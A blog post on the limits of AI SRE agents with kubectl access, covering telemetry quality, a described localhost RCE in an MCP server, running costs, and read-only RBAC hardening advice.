I Gave an AI Agent kubectl Access to My Cluster. Here's What Nobody Tells You About AI SRE

#ai #kubernetes #devops #security

TL;DR: An AI agent can genuinely help during an incident, but the demos skip the three hard parts: it only reasons as well as the telemetry it can retrieve, it can only fix anything if you give it write access, and the exact "give your agent kubectl" pattern everyone is copying just shipped a critical RCE (CVE-2025-65719) where one webpage visit compromises the whole cluster. Here's where the line actually is.

The demo that made me try it

You've seen the demo by now. Someone pastes an alert into a chat box, an agent fans out across logs and metrics, and thirty seconds later it says "the checkout latency spike started at 14:32, right after commit abc123 shipped a bad session-cache change, here's the rollback." The room claps.

I wanted that. I run on-call for production Kubernetes, and the 3 AM "which of forty services is actually on fire" problem is real. So I wired an agent into a cluster with an MCP server, gave it the usual read access, and started throwing incidents at it.

It's useful. I'll say that up front so nobody thinks this is a hit piece. But the gap between the demo and a thing you'd trust in production is enormous, and it's made of three walls the demos never show you.

Wall 1: The agent is only as smart as the telemetry it can reach

Here's the part the marketing quietly skips. An "AI SRE" isn't magic reasoning. It's an LLM doing retrieval-augmented generation over your data: logs, metrics, recent deploys, runbooks, and a service topology that says "checkout calls payment-gateway calls auth-db." Retrieve that context, inject it into the prompt, get a cited answer back.

incident.io, who sell one of these, are refreshingly blunt about it: without RAG anchoring the model to your specific infrastructure, "you're getting pattern-matched guesses, not investigated findings." That's the whole ballgame. The agent's ceiling is your observability, not the model.

Now look at your actual stack. Are your runbooks current, or are half of them a Confluence page last touched in 2023? Is there a real service catalog encoding dependencies, or does that graph live in one senior engineer's head? Are deploys correlated with metrics anywhere a machine can query, or do you eyeball Datadog next to GitHub in two tabs?

For most teams the honest answer is "partial, stale, and scattered." Feed that to an LLM and you don't get "I don't know." You get a confident, well-written root cause that's wrong, with citations to the stalest doc in the pile. The failure mode of a bad AI SRE isn't silence. It's plausible fiction at 3 AM, which is worse than no answer because it sends you chasing the wrong fix.

So the real prerequisite for AI SRE isn't a subscription. It's observability hygiene you probably haven't finished. If your telemetry is a mess, the agent industrializes that mess.

Wall 2: To fix anything, it needs hands. That's where it gets dangerous.

Reading is safe. The moment the demo gets exciting is the moment the agent stops suggesting a rollback and starts doing one. That requires write access to your cluster: kubectl apply, kubectl rollout undo, kubectl scale. Real credentials, real blast radius.

The common way to grant that today is an MCP server, a small process that exposes cluster operations to an AI assistant over natural language. And in May 2026, OX Security published CVE-2025-65719: a critical remote code execution in the popular kubectl-mcp-server project, all versions below 1.2.0.

The attack is almost insultingly simple, and it's worth understanding because it generalizes:

Your engineer has the MCP server running in the background on their laptop. Normal. That's how they let their assistant talk to the cluster.
The server listens on localhost and, in the vulnerable versions, shells out to run commands with Python's subprocess using shell=True, unauthenticated.
The engineer visits a malicious webpage. Just visits it. The page's JavaScript POSTs to localhost, hits the MCP server, and injects arbitrary shell commands.
Those commands run on the laptop, with that laptop's kubeconfig. Full cluster compromise: secrets, ConfigMaps, service accounts, the ability to deploy malicious pods and pivot into the rest of your cloud.

Sit with the shape of that. You didn't get phished into typing credentials. You didn't run a bad binary. You browsed the web while a helpful little server sat on localhost holding the keys to production. The disclosure timeline is its own lesson: reported November 2025, patched January 2026, publicly detailed in May. There was a long window where a lot of clusters were one bad tab away from takeover.

The point isn't "this one project was sloppy," though shell=True on an unauthenticated localhost listener is genuinely rough. The point is structural. The instant you give an agent hands, you create a new attack surface, and it usually lives on an engineer's laptop next to their browser and their cluster credentials. Every tool that grants write access is a candidate for the same class of bug. CVE-2025-65719 is just the first one with a catchy number.

Wall 3: The economics only work for the boring half

Say your telemetry is clean and you've locked the access down. Does the math work?

It depends entirely on which job you're buying. The two halves of "AI SRE" have wildly different returns:

Investigation and documentation: This is real, measurable ROI today. Auto-drafting a post-mortem turns roughly 90 minutes of Slack-scrollback reconstruction into about 10 minutes of editing. Correlating a metric spike with the deploy that caused it, with a citation you can verify in 30 seconds, genuinely compresses time-to-identify. If your team runs 18 incidents a month, the post-mortem savings alone are real hours.
Autonomous remediation: This is where the demos live and the value doesn't. Even the vendors selling it will tell you, if you read past the headline, that autonomous production action "remains limited" and needs a human in the loop.

And the running cost isn't trivial. These agents burn tokens fanning out across large log corpora, and observability data volume is the real cost driver, not seat licenses. One publicly discussed multi-agent SRE setup was reported to run close to €8,500 a month in production (see the r/sre write-ups). Vendors are quiet about absolute numbers for a reason. You're paying for the agent and for keeping enough clean telemetry queryable for it to be worth anything.

So the honest framing: you're mostly paying real money to automate investigation and paperwork, which is worth it, while the part that looked like the future stays behind a human approval gate.

Where it actually earns its keep

I don't want to leave you with "AI SRE is fake." It isn't. It's just narrower than the pitch. After running it against real incidents, here's where it consistently pays off:

Triage and severity classification. "Database CPU High" might be a P1 or a scheduled backup. An agent with access to past incidents and service context routes that correctly and cuts pages.
Parallel root-cause correlation. It tests several hypotheses at once across the full log history, something you do sequentially and slowly at 3 AM. It surfaces the likely culprit; you verify.
Post-mortem and timeline drafting. The single most reliable win. Let it reconstruct the timeline from alerts, deploys, and chat, then you edit.

The mental model that survives contact with production is the "glass box." A black box says "the root cause is a memory leak in auth-service" and you have no idea why it thinks that. A glass box says "based on this log line at 14:31 showing auth-service memory at 98%, correlated with this commit that changed session caching, the likely cause is the cache not evicting" with both sources linked. You verify in half a minute. If a vendor can't show the citation trail, walk away.

Here's that pattern on a real cluster I broke on purpose. A read-only agent pulls the symptom, the warning event, and the change that caused it, then hands you a hypothesis you can check against the actual commit:

And the operating pattern that keeps you safe is three steps, not one:

The agent proposes with evidence. A human approves. Then the action executes through a scoped, audited path. AI drafts the rollback PR; you click the button. Never let the middle step disappear, no matter how good the suggestions get.

If you're going to do this anyway, do this

You probably are going to try it, so here's the short list that keeps it from becoming CVE-2025-65719 in your environment:

Read-only by default. The agent's service account should get get, list, watch and nothing else until you have a specific reason otherwise. A minimal Role:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ai-sre-readonly
  namespace: production
rules:
  - apiGroups: ["", "apps"]
    resources: ["pods", "deployments", "events", "replicasets"]
    verbs: ["get", "list", "watch"]

Bind that to a dedicated ai-sre-readonly ServiceAccount. No create, update, delete, patch. No secrets read unless you truly need it, and if you do, scope it to named resources. kubectl auth can-i makes the boundary concrete, and this is the actual output from that service account:

Never expose the MCP server to the network. Bind to localhost only, require authentication or an API key even locally, and treat any "direct web access" convenience feature as a liability. The whole CVE hinged on an unauthenticated localhost listener a webpage could reach.
Patch and pin. If you're on kubectl-mcp-server, be on 1.2.0 or later. Treat MCP servers like any other privileged dependency: watch their advisories, pin versions, scan them.
Keep the human approval gate for every write. Propose, approve, execute. Put writes behind a PR or an explicit confirmation, and log every action to an audit trail with the citations that justified it.
Fix observability first. If your runbooks are stale and your topology lives in someone's head, spend the money there before you spend it on an agent. The agent multiplies whatever data quality you already have, in both directions.

The actual takeaway

"AI SRE" isn't a colleague you hire. It's a very fast, very literal junior engineer who reads every log in milliseconds, has no intuition, will state a wrong answer with total confidence, and, if you're careless, hands its cluster credentials to the first website you visit.

Point it at investigation and documentation, keep it in a glass box, make it propose while a human approves, and scope its access like you'd scope a service you don't trust, because you shouldn't. Do that and it's a real force multiplier on the worst night of your quarter. Skip it and you've built a confident fiction generator with root on your cluster.

The technology is further along than the skeptics think and much further from autonomous than the demos imply. The engineering job, same as it ever was, is knowing exactly where that line sits.

Resources: